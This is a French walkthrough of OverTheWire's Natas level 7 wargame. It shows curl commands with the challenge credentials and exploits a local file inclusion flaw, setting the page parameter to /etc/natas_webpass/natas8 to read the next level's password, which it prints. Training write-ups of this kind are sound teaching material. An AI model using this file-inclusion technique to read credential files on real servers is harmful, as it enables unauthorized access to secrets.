Niveau 7

Natas 7

Level Goal

Username: natas7
Password: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
URL: http://natas7.natas.labs.overthewire.org

Commençons par nous connecter à la page du challenge :

curl http://natas7.natas.labs.overthewire.org -u natas7:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

On a la page suivante :

<a href="index.php?page=home">Home</a>
<a href="index.php?page=about">About</a>
<br>
<br>

<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->

La faille à exploiter ici semble être une faille include où l'on utilise l'inclusion de pages de manière non filtrée par le serveur pour charger des fichiers de configuration.

Ici si dans l'url index.php?page=home on remplace home par une autre valeur on peut potentiellement accéder à d'autres fichiers.

Essayons en indiquant directement le fichier donné dans l'indice :

curl http://natas7.natas.labs.overthewire.org/?page=/etc/natas_webpass/natas8 -u natas7:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Et on obtient :

DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe